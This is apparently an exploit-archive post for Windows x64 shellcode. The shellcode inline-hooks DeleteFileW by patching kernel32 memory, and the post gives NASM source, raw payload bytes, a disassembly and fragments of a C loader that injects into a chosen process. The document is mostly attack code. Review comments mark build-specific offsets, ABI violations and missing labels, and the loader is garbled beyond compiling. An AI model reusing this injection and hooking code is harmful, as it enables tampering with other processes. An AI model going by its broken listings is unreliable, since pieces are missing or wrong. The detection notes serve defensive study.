	# Title : Windows x64 API Hooking Shellcode
	# Author : Roziul Hasan Khan Shifat
	# Size : 117 bytes
	# Date : 16/10/2017
	# Email :
	# Tested On : Windows 7 Ultimate x64



This shellcode hooks the DeleteFileW() API.
Warning: do not use this shellcode on explorer.exe; otherwise you won't be able to delete files from the Recycle Bin.



section .text
	global _start

;-----------------------------------------------------------------------
; Intel/NASM syntax, Windows x64 (Microsoft x64 ABI: args in rcx, rdx, r8, r9).
; Inline API hook installer: locates the kernel32 base through the PEB loader
; list, makes the first bytes of DeleteFileW writable with VirtualProtect,
; overwrites them with a 5-byte 'jmp rel32' to the payload bytes that follow
; 'call inj', restores the page protection and returns.
;
; Detection notes: VirtualProtect(..., PAGE_EXECUTE_READWRITE) on a page of a
; loaded kernel32 export, followed by a write to the export's first bytes, is
; the classic inline-hook pattern; comparing the in-memory .text of loaded
; modules against the on-disk image exposes the 0xE9 patch. The hook never
; forwards to the original DeleteFileW, so the hooked process loses file
; deletion entirely (the Recycle Bin warning above).
;
; NOTE(review): VirtualProtect and DeleteFileW are located by hard-coded
; offsets from the kernel32 base (0x29f0 and 0xa2b0 below), so this matches
; only the kernel32.dll build it was taken from ("Tested On : Windows 7
; Ultimate x64"); on any other build both addresses point into unrelated code.
; NOTE(review): compared with the disassembly further down, this listing is
; missing the 'inj:' label before 'pop rdx', the 'ret' after 'add rsp,4' and
; the 'shellcode:' label before 'call inj'; as pasted, 'jmp shellcode' and
; 'call inj' do not resolve.
;-----------------------------------------------------------------------

xor rdx,rdx
mov rax,[gs:rdx+0x60] ;PPEB (gs:[0x60] holds the PEB on x64)
mov rax,[rax+24] ;PPEB->Ldr
mov rsi,[rax+32] ;Ldr->InMemOrderModuleList.Flink (first list entry)
mov rax,[rsi] ;second entry
mov rsi,[rax] ;third entry -- assumes the usual exe, ntdll, kernel32 load order

mov rdi,[rsi+32] ;rdi=kernel32.dll base Address (DllBase, +0x20 from the InMemoryOrder link)

;rsi = kernel32 base + 0x29f0; hard-coded RVA, build-specific (see note above)
xor rsi,rsi
mov si,0x29f0
add rsi,rdi ;rsi=VirtualProtect()

;r12 = hook target; r12 is callee-saved in the MS x64 ABI, so it survives both
;VirtualProtect calls (the installer itself does not preserve it for its caller)
xor r12,r12
mov r12w,0xa2b0  ;0x0000a2b0 is Relative Address of DeleteFileW() -- build-specific
add r12,rdi ;r12=DeleteFileW()

;Changing memory attribute:
;VirtualProtect(lpAddress=r12, dwSize=9, flNewProtect=0x40 (PAGE_EXECUTE_READWRITE), lpflOldProtect=r14)
;dwSize is 9 because the patch below covers byte 0 (jmp opcode) plus the 8-byte store at [r12+1].
mov rcx,r12
push rdx ;rdx is still 0 here; it is popped into r8 so r8 = 0x40 after the byte write below

mov dl,9

pop r8
mov r8b,0x40 ;PAGE_EXECUTE_READWRITE
sub rsp,4 ;4-byte slot for the old-protection DWORD
lea r14,[rsp] ;r14 = &oldProtect; callee-saved, reused by the restore call
mov r9,r14
;NOTE(review): the MS x64 ABI requires 32 bytes of shadow space and a 16-byte
;aligned rsp at every call; 'sub rsp,4' provides neither, and by the ABI layout
;the oldProtect slot sits inside the callee's shadow space. It evidently worked
;on the tested build, but the call is fragile.
call rsi

mov [r12],byte 0xe9 ;jmp rel32 opcode; the displacement is filled in by inj
jmp shellcode ;'shellcode:' label (0x70 in the disassembly) is missing from this listing

;inj: (label missing here) -- entered by 'call inj' from the payload site, so the
;popped return address is the address of the payload bytes (the db line below)
pop rdx
sub rdx,r12
sub rdx,5 ;rel32 = payload - (hook + 5)
mov [r12+1],rdx ;8-byte store: the rel32 plus the upper half of rdx into bytes 5..8 of
                ;DeleteFileW (never executed once the jmp is in place; a dword store would do)

;VirtualProtect(r12, 9, oldProtect, &oldProtect) -- restore the saved protection
xor rdx,rdx
mov dl,9
mov rcx,r12
mov r8d,dword [r14] ;flNewProtect = the protection saved by the first call
mov r9,r14

call rsi
add rsp,4 ;drop the oldProtect slot ('ret' follows here in the disassembly)

;shellcode: (label missing here) -- 'call inj' pushes the address of the bytes
;that follow, which inj uses as the hook destination
call inj
;This is My own shellcode: the payload that runs in place of DeleteFileW once the
;hook is installed. Per the disassembly (0x75-0x107) it re-walks the PEB, adds two
;more hard-coded offsets to module bases, builds "user32.dll" and "API Blocked!"
;on the stack, makes two indirect calls, then adjusts rsp by 0x128 and returns.
db 0x48,0x31,0xd2,0x65,0x48,0x8b,0x42,0x60,0x48,0x8b,0x40,0x18,0x48,0x8b,0x70,0x20,0x48,0x8b,0x06,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x20,0x68,0x90,0x65,0x01,0x0a,0x80,0x74,0x24,0x03,0x0a,0x5b,0x48,0x01,0xfb,0x52,0x52,0x48,0xb8,0x75,0x73,0x65,0x72,0x33,0x32,0x2e,0x64,0x48,0x89,0x04,0x24,0x66,0xc7,0x44,0x24,0x08,0x6c,0x6c,0x48,0x8d,0x0c,0x24,0x48,0x83,0xec,0x58,0xff,0xd3,0x68,0xb8,0x12,0x07,0x0a,0x80,0x74,0x24,0x03,0x0a,0x5b,0x48,0x01,0xc3,0x48,0x31,0xc9,0x6a,0x10,0x41,0x59,0x51,0x51,0x48,0xba,0x41,0x50,0x49,0x20,0x42,0x6c,0x6f,0x63,0x48,0x89,0x14,0x24,0xc7,0x44,0x24,0x08,0x6b,0x65,0x64,0x21,0x48,0x8d,0x14,0x24,0x52,0x41,0x58,0x48,0x83,0xec,0x58,0x48,0x83,0xec,0x58,0xff,0xd3,0x90,0x48,0x31,0xd2,0x66,0xba,0x28,0x01,0x48,0x01,0xd4,0xc3



apiint.obj:     file format pe-x86-64

Disassembly of section .text:

0000000000000000 <_start>:
   0:	48 31 d2             	xor    %rdx,%rdx
   3:	65 48 8b 42 60       	mov    %gs:0x60(%rdx),%rax
   8:	48 8b 40 18          	mov    0x18(%rax),%rax
   c:	48 8b 70 20          	mov    0x20(%rax),%rsi
  10:	48 8b 06             	mov    (%rsi),%rax
  13:	48 8b 30             	mov    (%rax),%rsi
  16:	48 8b 7e 20          	mov    0x20(%rsi),%rdi
  1a:	48 31 f6             	xor    %rsi,%rsi
  1d:	66 be f0 29          	mov    $0x29f0,%si
  21:	48 01 fe             	add    %rdi,%rsi
  24:	4d 31 e4             	xor    %r12,%r12
  27:	66 41 bc b0 a2       	mov    $0xa2b0,%r12w
  2c:	49 01 fc             	add    %rdi,%r12
  2f:	4c 89 e1             	mov    %r12,%rcx
  32:	52                   	push   %rdx
  33:	b2 09                	mov    $0x9,%dl
  35:	41 58                	pop    %r8
  37:	41 b0 40             	mov    $0x40,%r8b
  3a:	48 83 ec 04          	sub    $0x4,%rsp
  3e:	4c 8d 34 24          	lea    (%rsp),%r14
  42:	4d 89 f1             	mov    %r14,%r9
  45:	ff d6                	callq  *%rsi
  47:	41 c6 04 24 e9       	movb   $0xe9,(%r12)
  4c:	eb 22                	jmp    70 <shellcode>

000000000000004e <inj>:
  4e:	5a                   	pop    %rdx
  4f:	4c 29 e2             	sub    %r12,%rdx
  52:	48 83 ea 05          	sub    $0x5,%rdx
  56:	49 89 54 24 01       	mov    %rdx,0x1(%r12)
  5b:	48 31 d2             	xor    %rdx,%rdx
  5e:	b2 09                	mov    $0x9,%dl
  60:	4c 89 e1             	mov    %r12,%rcx
  63:	45 8b 06             	mov    (%r14),%r8d
  66:	4d 89 f1             	mov    %r14,%r9
  69:	ff d6                	callq  *%rsi
  6b:	48 83 c4 04          	add    $0x4,%rsp
  6f:	c3                   	retq   

0000000000000070 <shellcode>:
  70:	e8 d9 ff ff ff       	callq  4e <inj>
  75:	48 31 d2             	xor    %rdx,%rdx
  78:	65 48 8b 42 60       	mov    %gs:0x60(%rdx),%rax
  7d:	48 8b 40 18          	mov    0x18(%rax),%rax
  81:	48 8b 70 20          	mov    0x20(%rax),%rsi
  85:	48 8b 06             	mov    (%rsi),%rax
  88:	48 8b 30             	mov    (%rax),%rsi
  8b:	48 8b 7e 20          	mov    0x20(%rsi),%rdi
  8f:	68 90 65 01 0a       	pushq  $0xa016590
  94:	80 74 24 03 0a       	xorb   $0xa,0x3(%rsp)
  99:	5b                   	pop    %rbx
  9a:	48 01 fb             	add    %rdi,%rbx
  9d:	52                   	push   %rdx
  9e:	52                   	push   %rdx
  9f:	48 b8 75 73 65 72 33 	movabs $0x642e323372657375,%rax
  a6:	32 2e 64 
  a9:	48 89 04 24          	mov    %rax,(%rsp)
  ad:	66 c7 44 24 08 6c 6c 	movw   $0x6c6c,0x8(%rsp)
  b4:	48 8d 0c 24          	lea    (%rsp),%rcx
  b8:	48 83 ec 58          	sub    $0x58,%rsp
  bc:	ff d3                	callq  *%rbx
  be:	68 b8 12 07 0a       	pushq  $0xa0712b8
  c3:	80 74 24 03 0a       	xorb   $0xa,0x3(%rsp)
  c8:	5b                   	pop    %rbx
  c9:	48 01 c3             	add    %rax,%rbx
  cc:	48 31 c9             	xor    %rcx,%rcx
  cf:	6a 10                	pushq  $0x10
  d1:	41 59                	pop    %r9
  d3:	51                   	push   %rcx
  d4:	51                   	push   %rcx
  d5:	48 ba 41 50 49 20 42 	movabs $0x636f6c4220495041,%rdx
  dc:	6c 6f 63 
  df:	48 89 14 24          	mov    %rdx,(%rsp)
  e3:	c7 44 24 08 6b 65 64 	movl   $0x2164656b,0x8(%rsp)
  ea:	21 
  eb:	48 8d 14 24          	lea    (%rsp),%rdx
  ef:	52                   	push   %rdx
  f0:	41 58                	pop    %r8
  f2:	48 83 ec 58          	sub    $0x58,%rsp
  f6:	48 83 ec 58          	sub    $0x58,%rsp
  fa:	ff d3                	callq  *%rbx
  fc:	90                   	nop
  fd:	48 31 d2             	xor    %rdx,%rdx
 100:	66 ba 28 01          	mov    $0x128,%dx
 104:	48 01 d4             	add    %rdx,%rsp
 107:	c3                   	retq   



// NOTE(review): the initializer bytes did not survive extraction; only the two
// placeholder comments remain. Presumably the interceptor bytes (0x00-0x74 in
// the disassembly, the 117 bytes named in the header) went under the first
// comment and the custom payload (0x75-0x107) under the second.
unsigned char shellcode[]=\

//Main Shellcode (Interceptor Shellcode)


//Your Custom shellcode 

// NOTE(review): only fragments of this loader survived extraction -- the braces,
// the conditionals and the API calls whose failures the printf() calls report are
// missing, and 'ps' is used without a visible declaration, so this does not
// compile as shown. From the surviving strings it takes a Toolhelp32 snapshot to
// list processes, prompts for a PID, opens that process and allocates memory in
// it -- the usual cross-process injection sequence, and the point at which
// defenders should expect telemetry (OpenProcess on, and remote allocation into,
// a foreign process such as the explorer.exe named in the warning above).
int main()
	HANDLE snap,proc,mem;
	DWORD len,l,pid;
		printf("CreateToolhelp32Snapshot() Failed"); // snapshot call itself is not in the fragment
		return 0; // NOTE(review): exits 0 on failure; a non-zero status would tell callers it failed
		printf("Process32First() Failed");
		return 0;
		printf("%s : %ld\n",ps.szExeFile,ps.th32ProcessID); // th32ProcessID is an unsigned DWORD; %lu is the matching conversion
	printf("\nEnter Process ID: ");
		printf("Failed to Open Process");
		return 0;
		printf("Failed to allocate memory in process");
		return 0;
	return 0;